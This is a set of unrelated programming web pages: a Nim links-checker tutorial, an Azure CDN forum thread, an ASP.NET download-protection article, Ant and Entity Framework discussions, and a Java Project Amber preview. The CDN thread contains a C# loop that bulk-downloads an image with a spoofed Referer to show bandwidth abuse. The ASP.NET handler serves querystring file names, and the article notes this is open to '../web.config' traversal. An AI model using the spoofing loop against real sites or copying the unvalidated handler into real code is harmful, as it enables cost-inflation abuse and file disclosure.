Day 4: LinksChecker

What to expect?

We will be writing a simple links checker in both sequential and asynchronous style in Nim.

Implementation

Step 0: Imports

```nim
import os, httpclient
import strutils
import times
import asyncdispatch
```

Step 1: Data types

```nim
type
  LinkCheckResult = ref object
    link: string
    state: bool
```

LinkCheckResult is a simple representation of a link and its state.

Step 2: GO Sequential!

```nim
proc checkLink(link: string): LinkCheckResult =
  var client = newHttpClient()
  try:
    return LinkCheckResult(link: link, state: client.get(link).code == Http200)
  except:
    return LinkCheckResult(link: link, state: false)
```

Here, we have a proc checkLink that takes a link and returns a LinkCheckResult:
- newHttpClient() creates a new client
- client.get sends a GET request to a link and returns a response
- response.code gives us the HTTP status code, and we consider a link valid if its status == 200
- client.get raises an error for badly structured links, which is why we wrapped it in a try/except block

```nim
proc sequentialLinksChecker(links: seq[string]): void =
  for index, link in links:
    if link.strip() != "":
      let result = checkLink(link)
      echo result.link, " is ", result.state
```

Here, the sequentialLinksChecker proc takes a sequence of links and executes checkLink on them sequentially:

```
LINKS: @["", "", "", "", "", ""]
SEQUENTIAL::
 is true
 is true
 is true
 is false
 is true
7.716497898101807
```

On my lousy internet it took 7.7 seconds to finish :(

Step 3: GO ASYNC!
We can do better than waiting on IO requests to finish.

```nim
proc checkLinkAsync(link: string): Future[LinkCheckResult] {.async.} =
  var client = newAsyncHttpClient()
  let future = client.get(link)
  yield future
  if future.failed:
    return LinkCheckResult(link: link, state: false)
  else:
    let resp = future.read()
    return LinkCheckResult(link: link, state: resp.code == Http200)
```

Here, we define a checkLinkAsync proc:
- to declare a proc as async we use the async pragma
- notice the client is created with newAsyncHttpClient, so it doesn't block on .get calls; client.get returns immediately with a future that can either fail (which we can learn from future.failed) or succeed
- yield future means "okay, I'm done for now, dear event loop; you can schedule other tasks and continue my execution when you have an update on my fancy future" - the event loop comes back when the future has some updates
- clearly, if the future failed we return the link with a false state
- otherwise, we get the response object that's enclosed in the future by calling read

```nim
proc asyncLinksChecker(links: seq[string]) {.async.} =
  # client.maxRedirects = 0
  var futures = newSeq[Future[LinkCheckResult]]()
  for index, link in links:
    if link.strip() != "":
      futures.add(checkLinkAsync(link))
  # waitFor -> call async proc from sync proc, await -> call async proc from async proc
  let done = await all(futures)
  for x in done:
    echo x.link, " is ", x.state
```

Here, we have another async procedure, asyncLinksChecker, that takes a sequence of links, creates futures for all of them, waits for them to finish, and gives us the results:
- futures is a sequence for the future results (the LinkCheckResults) of all the links passed to the asyncLinksChecker proc
- we loop over the links, get a future for the execution of checkLinkAsync, and add it to the futures sequence.
- we then block until we get all of the results out of the futures into the done variable
- then we print all the results
- please notice that await is used only to call an async proc from another async proc, and waitFor is used to call an async proc from a sync proc

```
ASYNC::
 is true
 is true
 is true
 is false
 is true
 is false
3.601503849029541
```

Step 4: A simple CLI

```nim
proc main() =
  echo "Param count: ", paramCount()
  if paramCount() == 1:
    let linksfile = paramStr(1)
    var f = open(linksfile, fmRead)
    let links = readAll(f).splitLines()
    echo "LINKS: " & $links
    echo "SEQUENTIAL:: "
    var t = epochTime()
    sequentialLinksChecker(links)
    echo epochTime()-t
    echo "ASYNC:: "
    t = epochTime()
    waitFor asyncLinksChecker(links)
    echo epochTime()-t
  else:
    echo "Please provide linksfile"

main()
```

The only interesting part is waitFor asyncLinksChecker(links): as we said, to call an async proc from a sync proc like this main proc, you need to use waitFor.

Extra: threading

```nim
import threadpool

proc checkLinkParallel(link: string): LinkCheckResult {.thread.} =
  var client = newHttpClient()
  try:
    return LinkCheckResult(link: link, state: client.get(link).code == Http200)
  except:
    return LinkCheckResult(link: link, state: false)
```

Same as before; only the thread pragma is used to note that the proc will be executed within a thread.

```nim
proc threadsLinksChecker(links: seq[string]): void =
  var LinkCheckResults = newSeq[FlowVar[LinkCheckResult]]()
  for index, link in links:
    LinkCheckResults.add(spawn checkLinkParallel(link))
  for x in LinkCheckResults:
    let res = ^x
    echo res.link, " is ", res.state
```

- spawned tasks (or threads) return a value of type FlowVar[T], where T is the return type of the spawned proc
- to get the value out of a FlowVar we use the ^ operator

Note: you should use nim.cfg with the flag -d:ssl to allow working with https.
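For completeness, here is how the program might be compiled and run; the file names below are assumptions for illustration (the code saved as linkschecker.nim, with links.txt holding one URL per line):

```shell
# enable SSL so https links work, as noted above (hypothetical file names)
echo '-d:ssl' > nim.cfg
# compile and run, passing the links file as the single CLI argument
nim c -r linkschecker.nim links.txt
```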
https://xmonader.github.io/nimdays/day04_asynclinkschecker.html
Asked by: Azure CDN bandwidth abuse by malicious bandwidth vampire requests

Question

Hello,

So here's the situation. Let's say that I am building a picture gallery website and I would like to use Azure CDN to deliver my content for me. In the backend, Azure CDN will pull content from an Azure storage account. CDN is fast and powerful, but it seems it can be a little insecure in terms of preventing someone from pulling content in very large quantities and thus leaving a user with a huge bandwidth bill. Let me demonstrate what I mean.

So last night I decided to write a simple console app that would download a simple image from my future-to-be picture gallery website, in a for loop; the code is below:

```csharp
using System;
using System.Drawing;
using System.Drawing.Imaging;
using System.IO;
using System.Net;

namespace RefererSpoofer
{
    class Program
    {
        static void Main(string[] args)
        {
            HttpWebRequest myHttpWebRequest = null;
            HttpWebResponse myHttpWebResponse = null;

            for (int x = 0; x < 1000; x++)
            {
                string myUri = "";
                myHttpWebRequest = (HttpWebRequest)WebRequest.Create(myUri);
                myHttpWebRequest.Referer = "";
                myHttpWebResponse = (HttpWebResponse)myHttpWebRequest.GetResponse();

                Stream response = myHttpWebResponse.GetResponseStream();
                StreamReader streamReader = new StreamReader(response);
                Image image = Image.FromStream(streamReader.BaseStream);
                image.Save(string.Format("D:\\Downloads\\image{0}.Jpeg", x), ImageFormat.Jpeg);
                myHttpWebResponse.Close();
            }
            Console.ReadKey();
        }
    }
}
```

This console application makes 1000 super-fast continuous requests to an image file that is hosted on my Azure CDN endpoint, and saves them to the 'D:\Downloads' folder on my PC, with each filename corresponding to the for loop iteration, i.e. image1.jpeg, image2.jpeg, etc.

So what just happened? In about 1 minute of time, I have cost myself 140MB of bandwidth.
With this being a Premium CDN, priced at $0.17/GB, let's do the math together: 0.14 GB * 60 minutes * 24 hours * 30 days * $0.17/GB = $1,028.16 of bandwidth costs, just if someone (a competitor, for example) kept requesting a single image for the duration of a month to jeopardize my website. I think you guys can see where I am going with this... my website will have thousands of images, in hi-res; btw, the image that I was using in this example was a mere 140KB in size. These types of requests can come from anonymous proxies, etc.

So the question that I have is: How can Azure protect a customer against such abuse? Obviously the customer can't be stuck paying $5,000 or $20,000 for bandwidth resulting from malicious requests.

Now Azure Premium CDN has an advanced Rules Engine that can filter out requests based on the Referer, and respond with a 403 error in case the Referer doesn't match your website. But the Referer can be faked, as I did in the above code sample, and the CDN still allows the requests to be served; I tested with a Referer spoof. This sucks; a lot of people use the Referer to prevent 'hotlinking', but what does it matter if it can be faked with just a line of code?

A couple of ideas that I've had in regards to preventing such abuse and huge bandwidth costs for customers:

1. When a request comes for content to the CDN, the CDN could make a call to the client server, passing in a) the IP address of the user and b) the CDN URI requested. The client server would then check how many times this URI was requested from this particular IP, and if the client logic sees that it was requested, let's say, 100 times over the past minute, then obviously this would signal abuse, because browsers cache images while malicious requests don't. So the client machine would simply reply 'false' to serving the content for this particular request.
This would not be a perfect solution, since the additional callback to client infrastructure would cause a small delay, yet it's definitely better than being potentially stuck with a bill that looks like the amount of money you have saved up in your savings account.

2. A better solution: build in a limit on the number of times a file can be served over the CDN within a particular time frame, per IP. For example, for the image file above, one could configure the CDN to serve no more than, let's say, 50 image requests / IP / within a 10 minute time frame. If abuse was detected, the CDN could, for a time defined by the customer, a) serve a 403 for the particular abused URI, or b) serve a 403 for all URIs if the request is coming from an abuser IP. All times / options should be left configurable to the customer. This would definitely help. There's no callback here, which saves time. The downside is that the CDN will have to keep track of URI / IP address / hit count.

Which solutions would NOT work:

1. Signed URLs won't work because the signature query string parameter would be different every time and browsers would constantly make requests for data, effectively wiping out the browser cache for images.

2. Having a SAS access signature for the blob would not work either, because a) the URI is different every time and b) there's no limit on how many times you can request a blob once a SAS is granted. So the abuse scenario is still possible.

3. Check your logs and simply ban by IP. I was testing this type of abuse via an anonymous proxy yesterday and it worked like a charm. I switched IPs in a matter of seconds and continued the abuse (of my own content) for testing purposes. So this is out as well, unless you have a nanny to monitor your logs.

Solutions that can work, but are not feasible:

1. Filter requests on your web server. Sure, this would be the best way to control the issue and track the number of requests / IP, and simply not serve the content when abuse is detected.
But then you lose the humongous benefit of delivering your content over a super-fast, proximity-to-client optimized CDN. Besides that, your servers will be slowed down a lot by serving out large content such as images.

3. Simply bite the bullet and not worry about it. Well... then you know that the pothole that will take your wheel out is just down the road, so no, it's not a comfortable feeling.

By the way, let's say that this does happen to a client; how would Azure handle such an issue? Would Azure give a full refund for such abuse if the customer can prove that this was indeed what happened? Would Azure give a partial refund, or any refund amount at all?

With all of the above said, the Premium CDN offering from Azure with the custom Rules Engine might offer a solution somewhere in there, but with very poor documentation and a lack of examples, one can only guess how to properly protect oneself; that's why I am writing this post. As far as I know there's also a WAF security rule set coming for Azure CDN. Could anyone comment on what time frame it is planned to come out, and whether it would have any features to detect and deflect the scenario described in this post? I would appreciate it if this would also be brought to the Azure CDN developers' attention so that a) maybe they can comment and b) they can build the countermeasures once they are aware of the issue.

Any suggestions are appreciated; I am very open minded on the issue. Thank you for reading.

Thursday, February 18, 2016 5:38 PM

All replies

Thanks for your very thorough and detailed feedback. Overall, the most secure and controlled solution is one where you require authentication for each request. When content is made publicly accessible to everyone, one is exposed to the risk of large bandwidth usage as a result of either a malicious attack on one's site or just because a site's content became very popular. The CDN is designed to handle massive and fast usage spikes worldwide.
This inherently adds additional risk for customers versus directly using an origin such as Azure Storage, which doesn't have the same scale capabilities. There are a few solutions to consider, some that are available now and others that we are working on providing later this year.

Solutions available now:

1. You can set a spending limit on your Azure account to limit the impact of large bandwidth usage - see for additional details on this.

2. If you don't expect to have a large # of requests for your content (e.g. 100's of concurrent requests), consider not using Azure CDN and just having your customers directly access content from your origin. Overall, Azure CDN is optimized for large concurrent requests for content. If you have a lot of long-tail static content that isn't accessed frequently, in many cases you will have better performance with requests going directly to your origin.

Solutions that will be available later this year:

1. Token authentication capabilities via the Premium SKU. Token authentication will allow one to require that specific or all requests must be authenticated. An encrypted token must be provided by clients and defines minimum requirements that must be met - e.g. client IP, allowed/denied countries, expiration time for the token, allowed hosts, allowed referrers, etc.

2. Real time alerts via the Premium SKU. Real time alerts will allow you to receive a notification either via email or HTTP POST when specific thresholds have been reached - e.g. bandwidth, # of requests, HTTP errors, etc.

3. Full CDN WAF offering. This may be the ideal solution for you, as it will allow one to define legitimate / illegitimate traffic via threat detection measures, access controls (e.g. IP address, country, etc.), and global settings. You will have the ability to either generate alerts or automatically block threats - e.g. throttle bandwidth.

Sunday, February 28, 2016 10:51 AM

Hi Anton,

Thank you for your reply.
I was just about to post this on the CDN feedback forum, but I noticed you replied here. So my thoughts after reading your reply are below.

In regards to the points you have mentioned for the options that are available now:

1. The spending limit seems more like the last line of defense for the account. While we surely will be having that, it's not exactly how we would want to prevent someone from just sucking up the bandwidth if they wanted to (and us having to pay that bill). Also, once the limit is reached it looks like it would shut down the services; this can't happen in a production environment.

2. That was one of the solutions I described that would not be feasible; having to serve images from web servers directly will probably kill the web servers. Having to serve images out of dedicated servers would likely double the hosting and maintenance costs for the customer.

In regards to the options that would be available later this year:

1. Are these signed URLs? I don't think these would work, because they would wipe out the browser's ability to cache the images. How could a browser cache the image if the URI is always different, with a unique token parameter at the end of it?

2. Certainly receiving alerts could be an option if the bandwidth goes through the roof. But one has to realize that banning simply by IP in that case is ineffective; anonymous proxies can swap IPs in seconds, and I have tested this scenario. Everything else about the request can be faked, including headers, referrer, browser version, etc. I spoofed the referrer in the code that I provided above, and Azure CDN was no longer blocking these requests with a 403 error. So the alerts are somewhat useless unless you really can do something about what's happening.

3. Sounds a little more interesting, specifically the bandwidth throttling feature. But how would it be configured?
What really needs to happen is the ability for the CDN to limit the number of requests from a particular IP, for a particular CDN URI, for a particular time frame. So an attacker, for example, can't request a particular image file or video file, from their IP, more than X times in a Y time frame. Would the WAF be able to do that? I looked into Amazon's WAF but didn't see anything. Looking at what's been done with WAFs now, they only seem to provide very basic functionality against attacks; because it's just so easy to fake anything about the request programmatically, one would be busy just maintaining the rules all the time. What this all really feels like is having a door made out of cardboard on your house that gives you a false sense of security; it's really a joke, that's what it is. Btw, right now it takes about 3 hours for a rule to kick in with the Premium SKU... but customers need a response in seconds, or minutes in the worst case scenario. We need a better product that can handle non-standard scenarios, not just "typical" cases; something that can hold its ground in advanced cases as well. With the scenario that I am describing here, it's so obvious that something like this can happen (and probably happens all the time) when your content is exposed publicly. As a customer, let me tell you: we love the speed of the CDN, but we also want our security. This really shouldn't be that hard to do, and can be implemented with dictionary lookups that are O(1) in efficiency in the CDN back-end. I am sharing this because this really does matter, and is a real issue, and no one has stepped up to it yet. Files are large nowadays, bandwidth is expensive, hackers are merciless, and competition is stiff. We need solutions to address such issues.

Tuesday, March 1, 2016 6:44 PM

I find it really hard to justify the use of the CDN now that I have realized the problem with malicious scenarios such as the ones AzureCloudDev pointed out.
Who can really afford to take the risk of an infinite-size bill for the very likely scenario of malicious behaviour? Having a spending limit for sure removes the possibility of an infinite bill. However, it doesn't sound like a very dynamic solution when shit hits the fan. Maybe some of the upcoming features Anton mentioned will help with the problem. However, with the new features, managing the CDN might become everything but easy, making it a no-go option for smaller teams and startups. So there might not be any single obvious solution for the problem. I am wondering how many developers are taking the risk of using the CDN without really understanding how vulnerable their bill really is. The CDN is expected to be the public, user-facing interface, contrary to, for example, Azure Storage, which is mainly used to build secure backends.

Sunday, March 20, 2016 11:34 PM
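The per-IP, per-URI request limit proposed earlier in the thread is, as noted, mostly dictionary bookkeeping. A sliding-window sketch in Python (purely illustrative; this is not an Azure CDN feature, and all names and numbers are made up):

```python
import time
from collections import defaultdict, deque

class PerIpRateLimiter:
    """Allow at most `limit` requests per (ip, uri) pair within `window` seconds."""

    def __init__(self, limit=50, window=600):
        self.limit = limit
        self.window = window
        self.hits = defaultdict(deque)  # (ip, uri) -> timestamps of recent hits

    def allow(self, ip, uri, now=None):
        now = time.monotonic() if now is None else now
        q = self.hits[(ip, uri)]
        while q and now - q[0] > self.window:  # evict hits outside the window
            q.popleft()
        if len(q) >= self.limit:
            return False  # over the limit: the edge would answer 403
        q.append(now)
        return True

# 3 requests per 60 seconds allowed; the 4th and 5th are rejected
limiter = PerIpRateLimiter(limit=3, window=60)
results = [limiter.allow("203.0.113.9", "/image.jpeg", now=t) for t in range(5)]
print(results)  # [True, True, True, False, False]
```

Each lookup and eviction is amortized O(1) per request, which matches the "dictionary lookups that are O(1)" point made above; a real edge implementation would also need expiry of idle keys so memory stays bounded.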
https://social.msdn.microsoft.com/Forums/en-US/9e37ca24-b38d-4193-847b-f679eab76aa5/azure-cdn-bandwidth-abuse-by-malicious-bandwidth-vampire-requests?forum=azurecdn
Let's start by examining the problem in a little more detail first. Forms Authentication in ASP.NET only works with requests that are handled by ASP.NET in IIS 6.0 (typically Windows Server 2003), which means that non-ASP.NET content bypasses aspnet_isapi.dll and is not subject to it.

Let's say you have a folder within your application called Private. You set up Forms Authentication to protect this folder, such as in the following web.config snippet:

```xml
<system.web>
  <authentication mode="Forms">
    <forms loginUrl="Private/Login.aspx" defaultUrl="Private/Default.aspx">
      <credentials passwordFormat="Clear">
        <user name="mike" password="test" />
      </credentials>
    </forms>
  </authentication>
</system.web>
<location path="Private">
  <system.web>
    <authorization>
      <deny users="?" />
    </authorization>
  </system.web>
</location>
```

The URL to your Private folder is. Any requests for that URL will invoke the default document, which in this case is Private/Default.aspx. Since that has been protected under Forms Authentication, and since all .aspx files are mapped to aspnet_isapi.dll, Forms Authentication kicks in and users who have not already logged in will be redirected to Private/Login.aspx. Login.aspx contains a straightforward Login control:

```xml
<form id="form1" runat="server">
  <div>
    <asp:Login ID="Login1" runat="server" OnAuthenticate="Login1_Authenticate" />
  </div>
</form>
```

And the code-behind contains the authentication logic:

```csharp
protected void Login1_Authenticate(object sender, AuthenticateEventArgs e)
{
    string username = Login1.UserName;
    string password = Login1.Password;
    if (FormsAuthentication.Authenticate(username, password))
    {
        FormsAuthentication.RedirectFromLoginPage(username, false);
    }
}
```

Users who successfully authenticate will be directed to Default.aspx, which contains links to downloadable files:

```xml
<form id="form1" runat="server">
  <div>
    <a href="HelloWorld.txt">Click Here to Get File</a>
  </div>
</form>
```

This seems to work, but if a non-authenticated user just enters the file's URL into their browser, the file will be served, as ASP.NET is not configured to handle .txt files.
As I mentioned before, the vast majority of articles on this topic show how to map .txt to aspnet_isapi.dll within IIS, create an HttpHandler to manage the file access, and then register that handler within the web.config file. If you do not have access to IIS, there is a simple workaround.

The first thing to do is to move all download files to a location where they cannot be browsed. Ideally, your web hosting company will have provided you with access to at least one folder above the root folder of your application. This is ideal, because no one can browse that folder since it is not part of the application itself. However, if you only have access to the root folder and its contents, there is still at least one other option - App_Data. Anything placed in App_Data is protected by ASP.NET, and requests for items within it are met with a 403 - Forbidden error message.

Once you have moved your files, you need a means to serve them to authenticated users, and an HttpHandler will do the job easily. Just go to Add... New Item, and select Generic Handler. You should be met with a new file with a .ashx extension containing code like this:

```csharp
public class MyFileHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        context.Response.ContentType = "text/plain";
        context.Response.Write("Hello World");
    }

    public bool IsReusable
    {
        get { return false; }
    }
}
```

The handler contains two members - ProcessRequest and IsReusable. The first houses the logic that needs to be run to process the current request, and the second dictates whether the handler can be pooled and reused for other requests. For the sake of simplicity, the default value of false can be left as it is. The point about the handler created from the Generic Handler option, with its .ashx extension, is that it is already mapped to aspnet_isapi.dll, so it can take part in Forms Authentication. Not only that, but it does not need to be registered within the web.config file.
Now it's simply a matter of adding some logic to validate the user, and retrieve the file they are after:

```csharp
public class MyFileHandler : IHttpHandler
{
    public void ProcessRequest(HttpContext context)
    {
        if (context.User.Identity.IsAuthenticated)
        {
            string filename = context.Request.QueryString["File"];
            // Validate the file name and make sure it is one that the user may access
            context.Response.Buffer = true;
            context.Response.Clear();
            context.Response.AddHeader("content-disposition", "attachment; filename=" + filename);
            context.Response.ContentType = "application/octet-stream";
            context.Response.WriteFile("~/App_Data/" + filename);
        }
    }

    public bool IsReusable
    {
        get { return false; }
    }
}
```

This is really simple. After establishing whether the current user is authenticated, the handler checks the querystring for a filename. At that point it is important to validate the filename, to make sure that it is one that the user can have access to. It is possible for a user to alter the querystring to point to folders above App_Data, such as the root directory, and request web.config by passing ../web.config into the querystring. This will throw an exception on most servers, as the ../ notation for parent paths is disabled by default. However, as a couple of commentators have mentioned below, this is not always the case.

Then the method simply uses Response.WriteFile() to deliver the file. I have set the ContentType of the file to application/octet-stream, and the content-disposition to attachment above, which will cover any type of file and always force a Save or Open dialogue box. You may prefer to check the file extension and set the ContentType accordingly. You may also want to add some error checking logic to ensure that a querystring value has been passed, that the file exists, etc.

However, if you are not using FormsAuthentication out of the box, you may instead be checking a session variable on each page to see if the user is logged in.
This being the case, you need to know that HttpHandlers do not have access to session state by default, so references to session variables will fail. One change is all that is required, and that is to make your HttpHandler implement IReadOnlySessionState (or IRequiresSessionState if you want to modify session variables). The HttpContext object that is passed in to the ProcessRequest() method provides access to session variables through its Session property.

```csharp
public class MyFileHandler : IHttpHandler, IReadOnlySessionState
{
    ....
```

That just leaves one question - how does the file name get into the querystring? Going back to Private/Default.aspx, we simply amend the link to point to the handler instead:

```xml
<form id="form1" runat="server">
  <div>
    <a href="MyFileHandler.ashx?File=HelloWorld.txt">Click Here to Get File</a>
  </div>
</form>
```

There we have it. Simple authentication checks made before delivering files, without having to register the handler in the web.config file, or mess about with IIS settings.

If you are being hosted on a server that runs IIS 7.0, things are a lot easier. With its new Integrated Pipeline model, a simple change to your application's web.config file will ensure that all content within your application is always handled by ASP.NET, so that non-ASP.NET content can take part in ASP.NET Forms Authentication. This article details how to make that change.
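For reference, the IIS 7.0 integrated-pipeline change mentioned at the end typically amounts to a web.config entry like the following (a sketch; the article linked above describes the exact change):

```xml
<configuration>
  <system.webServer>
    <!-- route every request (including .txt files) through the managed pipeline,
         so Forms Authentication applies to non-ASP.NET content too -->
    <modules runAllManagedModulesForAllRequests="true" />
  </system.webServer>
</configuration>
```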
https://www.mikesdotnetting.com/article/122/simple-file-download-protection-with-asp-net
> -----Original Message-----
> From: Rutger Hofman [mailto:rutger@cs.vu.nl]
> An incremental build should come with sophisticated dependency
> analysis. For this, there is <depend>. However, in my experience
> doing "ant depend build" is not at all necessarily faster than
> "ant clean build".
>
> So, an incremental build is only faster without "ant depend", but
> then the programmer should be very aware of overlooked dependencies.
>
> > From: Jan.Materne@rzf.fin-nrw.de:
> > But my opinion is
> > - do an incremental build during development (includes unit tests)
> > - (sometimes a clean build during development :-)
> > - do a clean build before system test and release
> >
> > > From: Travis Kline [mailto:traviskline1977@hotmail.com]
> > > I wanted to get the board's consensus on the clean build
> > > vs partial build debate. I have read in more than one source
> > > that it is a "good practice" to always perform a clean build.
> > > Why? If you are caching your destination directory when compiling,
> > > besides speed, is there any other benefit?
> > > What are you doing in your build?

I've seen two major pitfalls developers around me have fallen into with incremental builds:

1) Removed/renamed resources (.properties, .gif) in the source tree, not removed from the classes tree by an incremental build.
2) Removed/renamed Java sources, not removed from the classes tree by an incremental build.

I now have a solution for both I think, to be rolled out to all my projects soon:

For (1), instead of doing a <copy> of the resources into build/classes/, I'll now <lsync> them into build/resources/, with <lsync> in a strict mode where files in both src and dest trees must be absolutely equal (CVS can play tricks with dates, so checking file sizes and even checksums might be necessary).

For (2), I've developed a selector that parses a class file to identify which Java source it came from, to remove "orphan" class files.
Since the class parser is very specialized to just get that info, it's rather quick, but I'm also looking at caching options.

```java
/**
 * An Ant file selector that matches class files
 * which have no corresponding Java source file.
 * <p>
 * Note that class files compiled without debug information (specifically
 * the SourceFile attribute of the class file) will be ignored by this
 * selector.
 * .../...
 */
public class OrphanClassFileSelector extends BaseExtendSelector {
    .../...
}
```

With these two solutions, most of the mistakes I've seen from inexperienced developers (people with other expertise, also doing development) should be avoided, while not putting too much of a delay on incremental builds. I might not use these on large projects, for example.

I'll add two things:

1) Set up a CruiseControl (or equivalent) build of all your projects, so you can catch these kinds of errors early. The CC build does a clean build of course!
2) Most experienced developers usually feel when a full rebuild is necessary, and when things start behaving strangely, do a full rebuild before wasting time in a wild goose chase.

Cheers,
--DD

---------------------------------------------------------------------
To unsubscribe, e-mail: user-unsubscribe@ant.apache.org
For additional commands, e-mail: user-help@ant.apache.org
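DD's orphan-class cleanup can also be approximated without parsing class files, by mapping each .class file back to the source path it should have come from. Below is a rough sketch under an assumed layout (sources under srcDir mirror classes under buildDir); unlike the SourceFile-parsing selector above, it misses classes whose source file name differs from the class name:

```java
import java.nio.file.*;
import java.util.List;
import java.util.stream.*;

public class OrphanClassCleaner {

    // Delete .class files under buildDir whose corresponding .java file no
    // longer exists under srcDir. Inner classes (Foo$Bar.class, Foo$1.class)
    // are mapped back to their outer class's source file.
    static long clean(Path srcDir, Path buildDir) throws Exception {
        List<Path> orphans;
        try (Stream<Path> files = Files.walk(buildDir)) {
            orphans = files
                .filter(p -> p.toString().endsWith(".class"))
                .filter(p -> {
                    Path rel = buildDir.relativize(p);
                    String name = rel.getFileName().toString();
                    String outer = name.substring(0, name.length() - ".class".length());
                    int dollar = outer.indexOf('$');
                    if (dollar >= 0) outer = outer.substring(0, dollar);
                    Path source = srcDir.resolve(rel.resolveSibling(outer + ".java"));
                    return !Files.exists(source); // orphan: its source is gone
                })
                .collect(Collectors.toList());
        }
        for (Path orphan : orphans) {
            Files.delete(orphan);
        }
        return orphans.size();
    }

    public static void main(String[] args) throws Exception {
        // demo with throwaway directories
        Path src = Files.createTempDirectory("src");
        Path build = Files.createTempDirectory("build");
        Files.writeString(src.resolve("Keep.java"), "class Keep {}");
        Files.createFile(build.resolve("Keep.class"));
        Files.createFile(build.resolve("Gone.class")); // its source was removed
        System.out.println(clean(src, build)); // one orphan removed: Gone.class
    }
}
```

This is the directory-mirroring heuristic only; the class-file parsing approach from the email remains the robust way to handle classes compiled from differently named sources.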
http://mail-archives.apache.org/mod_mbox/ant-user/200309.mbox/%3CD44A54C298394F4E967EC8538B1E00F10248C85A@lgchexch002.lgc.com%3E
I'm setting up a model for a project and everything works as expected, except for the change below. I thought it'd be neat to specify the type as Type instead of string:

```csharp
namespace DataBase.Entities
{
    public class Lock
    {
        public Guid Id { get; set; }
        public DateTime? Occasion { get; set; }
        public int Counter { get; set; }
        public Type Entity { get; set; }
        //public string Entity { get; set; }
    }
}
```

This fails with:

```
System.ArgumentNullException: Value cannot be null. Parameter name: entitySet
```

I would always store the assembly-qualified type name instead of the type itself. A Type instance is not just a name but a lot of metadata that may be interesting at run-time, and it would be pointless to store (i.e. serialize) a Type instance as-is.

When you set the property, store the Type.AssemblyQualifiedName value:

```csharp
instance.Entity = typeof(X).AssemblyQualifiedName;
```

And the code that needs the actual type can call Type.GetType(lock.Entity) to build a Type instance again.
https://codedump.io/share/f5FwAULXnOtQ/1/why-can39t-i-have-property-of-type-type-in-my-model-for-entity-framework
How Project Amber Will Revolutionize Java

By Nicolai Parlog

This is the editorial for the SitePoint Java Channel newsletter that we send out every other Friday. Subscribe here!

Earlier this week Brian Goetz, Java Language Architect at Oracle, officially announced Project Amber, and I could not be more excited about it! It will continue what Java 8 began and make Java a much less verbose and even more fun language. Type inference, massively simplified data classes, pattern matching... all of this has been bubbling up in recent months, but it is great to see it put on official tracks. (While this might be new to Java, non-Java devs might scoff and look down on us with comments like, "we've been using that for ten years now." Well, good for you, but no reason to rain on our parade, so stfu!)

Revolutionary Fighters

I'm sure you can't wait to see those improvements I promised, so let's do that first. Once we've explored them I will spend a few words on Project Amber and release date speculations. (If you're interested to see how these proposals and value types might play together, have a look at What Future Java Might Look Like.)

Local Variable Type Inference

Java has done type inference since Java 5 (for type witnesses in generic methods) and the mechanism was extended in Java 7 (diamond operator), 8 (lambda parameter types), and 9 (diamond on anonymous classes). Under Project Amber it is planned to be extended to type declarations of local (!) variables. For more information, have a look at JEP 286.

Enhanced Enums

As it stands, enums cannot be generic, meaning you cannot give individual enum instances fields of specific types:

```java
// now
public enum FavoriteNumber {
    INTEGER(42),
    FLOAT(3.14f);
    // wouldn't it be nice if this were more specific than Number?
    public final Number favorite;

    FavoriteNumber(Number favorite) {
        this.favorite = favorite;
    }
}
```

Project Amber considers letting enums have type parameters:

```java
// maybe in the future
public enum FavoriteNumber<T extends Number> {
    INTEGER<Integer>(42),
    FLOAT<Float>(3.14f);

    public final T favorite;

    FavoriteNumber(T favorite) {
        this.favorite = favorite;
    }
}
```

And the great thing is, the compiler will perform sharp type checking and know which generic type a specific enum instance has:

```java
// maybe in the future
float favorite = FavoriteNumber.FLOAT.favorite;
```

For more information, have a look at JEP 301.

Lambda Leftovers

Great name, eh? These are a couple of smaller improvements to lambda expressions and method references. The first is that the compiler will be better at picking the target for a lambda expression or method reference in situations where it has to pick one of several overloads:

```java
// now; compile error: "ambiguous method call"
method(s -> false)

private void method(Predicate<String> p) { /* ... */ }
private void method(Function<String, String> f) { /* ... */ }
```

It is weird that the compiler thinks this is ambiguous, because to us it very much isn't. When lambda leftovers are implemented, the compiler will agree.

Java 8 deprecated _ as a variable name and disallowed it as a lambda parameter name. Java 9 will disallow using it as a variable name as well, so it is free to get a special meaning, namely to mark unused lambda parameters (yes, even more than one in the same expression):

```java
// maybe in the future
// ignore the parameter marked as `_`
BiFunction<Integer, String, String> f3 = (i, _) -> String.valueOf(i);
// if there were a TriFunction:
TriFunction<Integer, String, String, String> f4 = (i, _, _) -> String.valueOf(i);
```

Finally, Project Amber explores the possibility to let lambda parameters shadow variables in the enclosing scope.
This would make naming them a little easier because as it stands it can be a little onerous:

    private Map<String, Integer> wordLengthCache;

    // now
    public int computeLength(String word) {
        // can't reuse `word` in lambda, so... maybe `w`?
        wordLengthCache.computeIfAbsent(word, w -> w.length());
    }

    // maybe in the future
    public int computeLength(String word) {
        // the lambda parameter simply shadows `word`
        wordLengthCache.computeIfAbsent(word, word -> word.length());
    }

For more information, have a look at JEP 302.

Data Classes

We've all created plenty of simple data holder classes that needed dozens of lines of code for fields, constructor, accessors, equals, hashCode, toString. Project Amber explores data classes that would boil all of that boilerplate down to a single declaration. (There is no JEP for this proposal yet but Amber will adopt one as soon as there is.)

Pattern Matching

Project Amber explores what is commonly known as pattern matching. It works over all types, can have conditions that are more complex than equality checks, and is an expression, meaning it results in a value that can be assigned. Here's an example Brian showed at Devoxx Belgium a few months ago:

    // maybe in the future
    String formatted = switch (constant) {
        case Integer i -> String.format("int %d", i);
        case Byte b -> // ...
        case Long l -> // ...
        // ...
        default -> "unknown";
    };

(There is no JEP for this proposal yet but Amber will adopt one as soon as there is.)

Project Amber

Now that we know which features are currently being explored as part of Project Amber, it is time to take a closer look at the project itself. In the welcome mail it is described as an "incubation ground for selected productivity-oriented Java language JEPs." Loosely said, its scope is defined as whatever JEP the expert group finds interesting and aligns with the overall mission statement: To be considered for adoption by Project Amber, a feature should first be described by a JEP.
This means that this is not the place for discussing random language feature ideas (the whole rest of the internet is still available for that); let's keep the focus on the specific features that have been adopted. Read that mail to get links to JEPs, mailing lists, and the repo.

Release Date

